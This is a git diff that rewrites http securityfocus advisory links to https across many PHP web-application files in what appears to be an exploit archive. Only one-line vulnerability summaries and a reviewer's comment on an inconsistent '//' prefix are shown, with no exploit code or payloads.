@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12916/info +source: https://www.securityfocus.com/bid/12916/info Multiple input validation vulnerabilities reportedly affect Valdersoft Shopping Cart. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25302.txt b/exploits/php/webapps/25302.txt index 80518cf78..4d26ac09e 100644 --- a/exploits/php/webapps/25302.txt +++ b/exploits/php/webapps/25302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12917/info +source: https://www.securityfocus.com/bid/12917/info Multiple remote input validation vulnerabilities affect phpCoin. diff --git a/exploits/php/webapps/25308.txt b/exploits/php/webapps/25308.txt index 146cf3576..c14a0ac6b 100644 --- a/exploits/php/webapps/25308.txt +++ b/exploits/php/webapps/25308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25309.txt b/exploits/php/webapps/25309.txt index d9b23b378..1ca74fd9e 100644 --- a/exploits/php/webapps/25309.txt +++ b/exploits/php/webapps/25309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25310.txt b/exploits/php/webapps/25310.txt index 505fd69c5..d558d2f87 100644 --- a/exploits/php/webapps/25310.txt +++ b/exploits/php/webapps/25310.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25311.txt b/exploits/php/webapps/25311.txt index e770d2c67..6974d383d 100644 --- a/exploits/php/webapps/25311.txt +++ b/exploits/php/webapps/25311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25312.txt b/exploits/php/webapps/25312.txt index 744bbf45f..fa038eb6d 100644 --- a/exploits/php/webapps/25312.txt +++ b/exploits/php/webapps/25312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12920/info +source: https://www.securityfocus.com/bid/12920/info Multiple input validation vulnerabilities reportedly affect PhotoPost Pro. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25314.txt b/exploits/php/webapps/25314.txt index 39e3d0ea2..fecf10db8 100644 --- a/exploits/php/webapps/25314.txt +++ b/exploits/php/webapps/25314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12926/info +source: https://www.securityfocus.com/bid/12926/info The Includer is reported prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25315.html b/exploits/php/webapps/25315.html index acc4c7fc7..e72f5d2d2 100644 --- a/exploits/php/webapps/25315.html +++ b/exploits/php/webapps/25315.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12929/info +source: https://www.securityfocus.com/bid/12929/info Chatness is prone to an HTML injection vulnerability. This issue is exposed through various chat message form fields. diff --git a/exploits/php/webapps/25316.txt b/exploits/php/webapps/25316.txt index a2ac88e42..09d366e99 100644 --- a/exploits/php/webapps/25316.txt +++ b/exploits/php/webapps/25316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12930/info +source: https://www.securityfocus.com/bid/12930/info CPG Dragonfly is prone to multiple cross-site scripting vulnerabilities in various modules. diff --git a/exploits/php/webapps/25317.txt b/exploits/php/webapps/25317.txt index 9283cec91..a450fba97 100644 --- a/exploits/php/webapps/25317.txt +++ b/exploits/php/webapps/25317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12931/info +source: https://www.securityfocus.com/bid/12931/info Ublog is affected by a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25320.txt b/exploits/php/webapps/25320.txt index 0e7ab56d6..3c2780af9 100644 --- a/exploits/php/webapps/25320.txt +++ b/exploits/php/webapps/25320.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12944/info +source: https://www.securityfocus.com/bid/12944/info Squirrelcart is affected by an SQL injection vulnerability. diff --git a/exploits/php/webapps/25323.txt b/exploits/php/webapps/25323.txt index b102e7142..344a1420e 100644 --- a/exploits/php/webapps/25323.txt +++ b/exploits/php/webapps/25323.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12957/info +source: https://www.securityfocus.com/bid/12957/info MX Shop is reportedly affected by an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25327.txt b/exploits/php/webapps/25327.txt index 9e2a96865..e9e0bc835 100644 
--- a/exploits/php/webapps/25327.txt +++ b/exploits/php/webapps/25327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12973/info +source: https://www.securityfocus.com/bid/12973/info EPay Pro is reported prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25328.txt b/exploits/php/webapps/25328.txt index 3b919c328..f42a8fa89 100644 --- a/exploits/php/webapps/25328.txt +++ b/exploits/php/webapps/25328.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12974/info +source: https://www.securityfocus.com/bid/12974/info It is reported that EPay Pro is affected by various cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/25330.txt b/exploits/php/webapps/25330.txt index 2eb80930a..05942786e 100644 --- a/exploits/php/webapps/25330.txt +++ b/exploits/php/webapps/25330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12982/info +source: https://www.securityfocus.com/bid/12982/info phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to the 'convcharset' parameter. diff --git a/exploits/php/webapps/25337.txt b/exploits/php/webapps/25337.txt index 2e6b366aa..6b325c7ef 100644 --- a/exploits/php/webapps/25337.txt +++ b/exploits/php/webapps/25337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13002/info +source: https://www.securityfocus.com/bid/13002/info PayProCart is prone to a cross-site scripting vulnerability affecting the 'usrdetails.php' script. diff --git a/exploits/php/webapps/25338.txt b/exploits/php/webapps/25338.txt index 5034f6a16..3b018be20 100644 --- a/exploits/php/webapps/25338.txt +++ b/exploits/php/webapps/25338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13006/info +source: https://www.securityfocus.com/bid/13006/info ProfitCode Software PayProCart may allow a remote attacker to carry out directory traversal attacks. 
diff --git a/exploits/php/webapps/25339.txt b/exploits/php/webapps/25339.txt index f8a36a4a4..35308f0da 100644 --- a/exploits/php/webapps/25339.txt +++ b/exploits/php/webapps/25339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13007/info +source: https://www.securityfocus.com/bid/13007/info It is reported that the PHP-Nuke 'Your_Account' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25340.txt b/exploits/php/webapps/25340.txt index 5a50b7e2e..dfad28673 100644 --- a/exploits/php/webapps/25340.txt +++ b/exploits/php/webapps/25340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13010/info +source: https://www.securityfocus.com/bid/13010/info It is reported that the PHP-Nuke 'Your_Account' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25341.html b/exploits/php/webapps/25341.html index 6782601f5..8d6357fa8 100644 --- a/exploits/php/webapps/25341.html +++ b/exploits/php/webapps/25341.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13011/info +source: https://www.securityfocus.com/bid/13011/info It is reported that the PHP-Nuke 'Downloads' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25342.txt b/exploits/php/webapps/25342.txt index c0d5a63ed..160bebbbe 100644 --- a/exploits/php/webapps/25342.txt +++ b/exploits/php/webapps/25342.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13025/info +source: https://www.securityfocus.com/bid/13025/info PHP-Nuke is reportedly affected by multiple cross-site scripting vulnerabilities in the Web_Links Module. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25343.txt b/exploits/php/webapps/25343.txt index e21dfccf9..0d77fde60 100644 --- a/exploits/php/webapps/25343.txt +++ b/exploits/php/webapps/25343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13026/info +source: https://www.securityfocus.com/bid/13026/info PHP-Nuke is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25344.txt b/exploits/php/webapps/25344.txt index ff4c52b5f..28187e401 100644 --- a/exploits/php/webapps/25344.txt +++ b/exploits/php/webapps/25344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13028/info +source: https://www.securityfocus.com/bid/13028/info The DLMan Pro mod for phpBB is reportedly affected by an SQL Injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25345.txt b/exploits/php/webapps/25345.txt index f53e28e6d..8c88e8863 100644 --- a/exploits/php/webapps/25345.txt +++ b/exploits/php/webapps/25345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13030/info +source: https://www.securityfocus.com/bid/13030/info The Linkz Pro mod for phpBB is reportedly affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25354.txt b/exploits/php/webapps/25354.txt index 474bac8f8..67f0fafdf 100644 --- a/exploits/php/webapps/25354.txt 
+++ b/exploits/php/webapps/25354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13046/info +source: https://www.securityfocus.com/bid/13046/info Ocean12 Membership Manager Pro is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25355.txt b/exploits/php/webapps/25355.txt index 26c31de79..3fe2dfef1 100644 --- a/exploits/php/webapps/25355.txt +++ b/exploits/php/webapps/25355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13050/info +source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25356.txt b/exploits/php/webapps/25356.txt index 5a312e392..b2bac45ee 100644 --- a/exploits/php/webapps/25356.txt +++ b/exploits/php/webapps/25356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13050/info +source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25357.txt b/exploits/php/webapps/25357.txt index 86b6a662f..0121b1b64 100644 --- a/exploits/php/webapps/25357.txt +++ b/exploits/php/webapps/25357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13050/info +source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25358.txt b/exploits/php/webapps/25358.txt index 2cde36e40..239833957 100644 
--- a/exploits/php/webapps/25358.txt +++ b/exploits/php/webapps/25358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13050/info +source: https://www.securityfocus.com/bid/13050/info CubeCart is reported prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25360.txt b/exploits/php/webapps/25360.txt index 61df7657d..0c62a6fdd 100644 --- a/exploits/php/webapps/25360.txt +++ b/exploits/php/webapps/25360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13055/info +source: https://www.securityfocus.com/bid/13055/info The Web_Links module of PHP-Nuke is affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25366.txt b/exploits/php/webapps/25366.txt index faf1a85a7..2f72c8eba 100644 --- a/exploits/php/webapps/25366.txt +++ b/exploits/php/webapps/25366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13075/info +source: https://www.securityfocus.com/bid/13075/info A remote cross-site scripting vulnerability affects PostNuke. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25367.txt b/exploits/php/webapps/25367.txt index b4d66f369..b04c09e16 100644 --- a/exploits/php/webapps/25367.txt +++ b/exploits/php/webapps/25367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13076/info +source: https://www.securityfocus.com/bid/13076/info A remote cross-site scripting vulnerability affects PostNuke. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. 
diff --git a/exploits/php/webapps/25368.txt b/exploits/php/webapps/25368.txt index 662960ade..39f077d4d 100644 --- a/exploits/php/webapps/25368.txt +++ b/exploits/php/webapps/25368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13077/info +source: https://www.securityfocus.com/bid/13077/info A remote SQL Injection vulnerability affects PostNuke Phoenix. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/php/webapps/25369.txt b/exploits/php/webapps/25369.txt index dd38f7a60..f8ac1d612 100644 --- a/exploits/php/webapps/25369.txt +++ b/exploits/php/webapps/25369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13080/info +source: https://www.securityfocus.com/bid/13080/info RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection. diff --git a/exploits/php/webapps/25370.txt b/exploits/php/webapps/25370.txt index f8f24cb40..e4221f82c 100644 --- a/exploits/php/webapps/25370.txt +++ b/exploits/php/webapps/25370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13080/info +source: https://www.securityfocus.com/bid/13080/info RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection. diff --git a/exploits/php/webapps/25371.txt b/exploits/php/webapps/25371.txt index 4307801a5..e26d399db 100644 --- a/exploits/php/webapps/25371.txt +++ b/exploits/php/webapps/25371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13080/info +source: https://www.securityfocus.com/bid/13080/info RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection. diff --git a/exploits/php/webapps/25372.txt b/exploits/php/webapps/25372.txt index 603f733ae..34b1db0fa 100644 
--- a/exploits/php/webapps/25372.txt +++ b/exploits/php/webapps/25372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13080/info +source: https://www.securityfocus.com/bid/13080/info RadBids Gold is reported prone to multiple vulnerabilities. These issues include arbitrary file disclosure, cross-site scripting, and SQL injection. diff --git a/exploits/php/webapps/25373.txt b/exploits/php/webapps/25373.txt index 3bdc7617b..1b6144c9e 100644 --- a/exploits/php/webapps/25373.txt +++ b/exploits/php/webapps/25373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13082/info +source: https://www.securityfocus.com/bid/13082/info AzDGDatingPlatinum is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/25374.txt b/exploits/php/webapps/25374.txt index d4d40b40a..30747f441 100644 --- a/exploits/php/webapps/25374.txt +++ b/exploits/php/webapps/25374.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13082/info +source: https://www.securityfocus.com/bid/13082/info AzDGDatingPlatinum is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/25376.txt b/exploits/php/webapps/25376.txt index 9847fed30..fe7875859 100644 --- a/exploits/php/webapps/25376.txt +++ b/exploits/php/webapps/25376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13086/info +source: https://www.securityfocus.com/bid/13086/info ModernBill is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25377.txt b/exploits/php/webapps/25377.txt index c9b4a742a..147802e6a 100644 --- a/exploits/php/webapps/25377.txt +++ b/exploits/php/webapps/25377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13087/info +source: https://www.securityfocus.com/bid/13087/info ModernBill is affected by a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25378.txt b/exploits/php/webapps/25378.txt index b69d918df..d5e2e70cc 100644 --- a/exploits/php/webapps/25378.txt 
+++ b/exploits/php/webapps/25378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13089/info +source: https://www.securityfocus.com/bid/13089/info ModernBill is affected by a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25379.txt b/exploits/php/webapps/25379.txt index 5eaa8028b..cce75e644 100644 --- a/exploits/php/webapps/25379.txt +++ b/exploits/php/webapps/25379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13094/info +source: https://www.securityfocus.com/bid/13094/info zOOm Media Gallery is reportedly affected by a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25380.txt b/exploits/php/webapps/25380.txt index b2935a827..e31a47d51 100644 --- a/exploits/php/webapps/25380.txt +++ b/exploits/php/webapps/25380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13097/info +source: https://www.securityfocus.com/bid/13097/info Invision Power Board is reported prone to an SQL injection vulnerability. Due to improper filtering of user-supplied data, attackers may pass SQL statements to the underlying database through the 'st' parameter. diff --git a/exploits/php/webapps/25381.txt b/exploits/php/webapps/25381.txt index a66461ca8..9918d3bff 100644 --- a/exploits/php/webapps/25381.txt +++ b/exploits/php/webapps/25381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13101/info +source: https://www.securityfocus.com/bid/13101/info WebCT is reportedly affected by an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to using it in dynamically generated content. diff --git a/exploits/php/webapps/25382.txt b/exploits/php/webapps/25382.txt index 0bd88bd85..705e0fa61 100644 --- a/exploits/php/webapps/25382.txt +++ b/exploits/php/webapps/25382.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13103/info +source: https://www.securityfocus.com/bid/13103/info JPortal is reportedly affected by an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25394.txt b/exploits/php/webapps/25394.txt index fe6651ba1..4f70d9957 100644 --- a/exploits/php/webapps/25394.txt +++ b/exploits/php/webapps/25394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13138/info +source: https://www.securityfocus.com/bid/13138/info Pinnacle Cart is affected by a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25398.txt b/exploits/php/webapps/25398.txt index 8845efb01..986bfb065 100644 --- a/exploits/php/webapps/25398.txt +++ b/exploits/php/webapps/25398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13149/info +source: https://www.securityfocus.com/bid/13149/info phpBB2 Plus is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25399.txt b/exploits/php/webapps/25399.txt index ee9508c06..a18c88196 100644 --- a/exploits/php/webapps/25399.txt +++ b/exploits/php/webapps/25399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13150/info +source: https://www.securityfocus.com/bid/13150/info phpBB2 Plus is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25400.txt b/exploits/php/webapps/25400.txt index ea63b6764..ae890f1ce 100644 --- a/exploits/php/webapps/25400.txt +++ b/exploits/php/webapps/25400.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13151/info +source: https://www.securityfocus.com/bid/13151/info phpBB2 Plus is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25401.txt b/exploits/php/webapps/25401.txt index 3a21df0c3..9bd154f5e 100644 --- a/exploits/php/webapps/25401.txt +++ b/exploits/php/webapps/25401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13153/info +source: https://www.securityfocus.com/bid/13153/info phpBB2 Plus is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25403.txt b/exploits/php/webapps/25403.txt index eb1116a3f..8318ab652 100644 --- a/exploits/php/webapps/25403.txt +++ b/exploits/php/webapps/25403.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13157/info +source: https://www.securityfocus.com/bid/13157/info Photo Album is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25404.txt b/exploits/php/webapps/25404.txt index 2d0ab89ad..90bab94b7 100644 --- a/exploits/php/webapps/25404.txt +++ b/exploits/php/webapps/25404.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13158/info +source: https://www.securityfocus.com/bid/13158/info Photo Album is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25422.txt b/exploits/php/webapps/25422.txt index 259d87780..679015c3a 100644 --- a/exploits/php/webapps/25422.txt +++ b/exploits/php/webapps/25422.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13169/info +source: https://www.securityfocus.com/bid/13169/info All4WWW-Homepagecreator is affected by an arbitrary remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an 'include()' function call. diff --git a/exploits/php/webapps/25423.txt b/exploits/php/webapps/25423.txt index 4d33e7c84..ac650506a 100644 --- a/exploits/php/webapps/25423.txt +++ b/exploits/php/webapps/25423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13170/info +source: https://www.securityfocus.com/bid/13170/info sphpBlog is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25430.txt b/exploits/php/webapps/25430.txt index 3b0547abb..e72f141bd 100644 --- a/exploits/php/webapps/25430.txt +++ b/exploits/php/webapps/25430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13201/info +source: https://www.securityfocus.com/bid/13201/info PHP-Nuke is prone to a HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25431.pl b/exploits/php/webapps/25431.pl index a2fdab082..06c5564dd 100755 --- a/exploits/php/webapps/25431.pl +++ b/exploits/php/webapps/25431.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13206/info +source: https://www.securityfocus.com/bid/13206/info A remote file include vulnerability affects Ariadne CMS. This issue is due to a failure of the application to validate critical parameters before using them in a 'require_once()' function call. diff --git a/exploits/php/webapps/25432.txt b/exploits/php/webapps/25432.txt index 80139b284..0a641d958 100644 --- a/exploits/php/webapps/25432.txt +++ b/exploits/php/webapps/25432.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13209/info +source: https://www.securityfocus.com/bid/13209/info A remote SQL injection vulnerability affects the datenbank module for phpbb. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/php/webapps/25433.txt b/exploits/php/webapps/25433.txt index 1d2d7672a..58e741060 100644 --- a/exploits/php/webapps/25433.txt +++ b/exploits/php/webapps/25433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13210/info +source: https://www.securityfocus.com/bid/13210/info A remote cross-site scripting vulnerability affects the datenbank module for phpbb. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25434.txt b/exploits/php/webapps/25434.txt index cd5421e45..eac632a9b 100644 --- a/exploits/php/webapps/25434.txt +++ b/exploits/php/webapps/25434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13212/info +source: https://www.securityfocus.com/bid/13212/info eGroupWare is prone to multiple input validation vulnerabilities. A fixed version is available. diff --git a/exploits/php/webapps/25435.txt b/exploits/php/webapps/25435.txt index 28d535e64..1069aeac3 100644 --- a/exploits/php/webapps/25435.txt +++ b/exploits/php/webapps/25435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13212/info +source: https://www.securityfocus.com/bid/13212/info eGroupWare is prone to multiple input validation vulnerabilities. A fixed version is available. diff --git a/exploits/php/webapps/25436.txt b/exploits/php/webapps/25436.txt index ec7123328..38679cbca 100644 --- a/exploits/php/webapps/25436.txt +++ b/exploits/php/webapps/25436.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13212/info +source: https://www.securityfocus.com/bid/13212/info eGroupWare is prone to multiple input validation vulnerabilities. A fixed version is available. diff --git a/exploits/php/webapps/25437.txt b/exploits/php/webapps/25437.txt index 24fbde39c..4fdc07cb8 100644 --- a/exploits/php/webapps/25437.txt +++ b/exploits/php/webapps/25437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13212/info +source: https://www.securityfocus.com/bid/13212/info eGroupWare is prone to multiple input validation vulnerabilities. A fixed version is available. diff --git a/exploits/php/webapps/25438.txt b/exploits/php/webapps/25438.txt index d73a0d84b..c4981f77e 100644 --- a/exploits/php/webapps/25438.txt +++ b/exploits/php/webapps/25438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13213/info +source: https://www.securityfocus.com/bid/13213/info mvnForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25451.txt b/exploits/php/webapps/25451.txt index 1ca0b5bbf..c1dcf0fa4 100644 --- a/exploits/php/webapps/25451.txt +++ b/exploits/php/webapps/25451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13219/info +source: https://www.securityfocus.com/bid/13219/info Knowledge Base Module is affected by an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25457.c b/exploits/php/webapps/25457.c index 8fab5fd1b..706c10c09 100644 --- a/exploits/php/webapps/25457.c +++ b/exploits/php/webapps/25457.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13253/info +// source: https://www.securityfocus.com/bid/13253/info It is reported that UBB.threads is prone to an SQL injection vulnerability. 
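Review bot: In the exploits/php/webapps/25457.c hunk, the replacement line gains a `//` prefix (`+// source: https://www.securityfocus.com/bid/13253/info`), but the unchanged context line that follows it ("It is reported that UBB.threads is prone to an SQL injection vulnerability.") is still bare prose, so the advisory header is only partly commented and the top of the file is still not valid C. If the goal is a compilable file, wrap the whole header in one `/* ... */` block; if the goal is only the http to https rewrite, drop the `//` so this hunk matches the rest of the patch. The treatment of non-.txt files is also inconsistent within this patch: 25431.pl (mode 100755) and 25315.html receive the same URL change with the `source:` line left uncommented. Pick one rule for source files and apply it to all three.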
diff --git a/exploits/php/webapps/25458.txt b/exploits/php/webapps/25458.txt index a4a549e13..06202d70e 100644 --- a/exploits/php/webapps/25458.txt +++ b/exploits/php/webapps/25458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13255/info +source: https://www.securityfocus.com/bid/13255/info CityPost PHP LNKX is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'message.php' script. diff --git a/exploits/php/webapps/25459.txt b/exploits/php/webapps/25459.txt index 83bc5a286..dde69ae80 100644 --- a/exploits/php/webapps/25459.txt +++ b/exploits/php/webapps/25459.txt @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/13256/info -source: http://www.securityfocus.com/bid/13257/info -source: http://www.securityfocus.com/bid/13258/info -source: http://www.securityfocus.com/bid/13259/info -source: http://www.securityfocus.com/bid/13260/info +source: https://www.securityfocus.com/bid/13256/info +source: https://www.securityfocus.com/bid/13257/info +source: https://www.securityfocus.com/bid/13258/info +source: https://www.securityfocus.com/bid/13259/info +source: https://www.securityfocus.com/bid/13260/info CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script. diff --git a/exploits/php/webapps/25464.txt b/exploits/php/webapps/25464.txt index 1063b7e4e..825d2b077 100644 --- a/exploits/php/webapps/25464.txt +++ b/exploits/php/webapps/25464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13261/info +source: https://www.securityfocus.com/bid/13261/info CityPost Simple PHP Upload is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'simple-upload-53.php' script. 
